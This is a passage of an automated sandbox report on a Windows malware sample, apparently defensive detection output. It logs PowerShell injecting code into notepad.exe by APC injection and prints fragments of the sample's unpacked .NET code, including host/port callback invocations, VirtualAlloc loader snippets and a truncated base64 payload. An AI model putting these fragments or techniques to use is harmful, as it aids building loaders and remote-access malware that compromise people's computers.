              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Messages.cs.Net Code: Memory
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_00000288574300DF push ebp; iretd 4_2_00000288574300E0
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_0000028857430006 push edi; ret 4_2_0000028857430022

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 28858ED0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 28870F70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5634Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4101Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\notepad.exe TID: 4276Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\notepad.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\System32\notepad.exeJump to behavior
              Hijacks the control flow in another process
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 384 base: 2885743010F value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 384 base: 2885743018B value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 384 base: 2885743018D value: FFJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\System32\notepad.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430001Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430002Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430003Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430004Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430005Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430006Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430007Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430009Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743000FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430010Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430011Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430012Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430013Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430014Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430015Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430016Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430017Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430018Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430019Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743001FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430020Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430021Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430022Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430023Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430024Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430025Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430026Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430027Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430028Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430029Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743002FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430030Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430031Jump to behavior
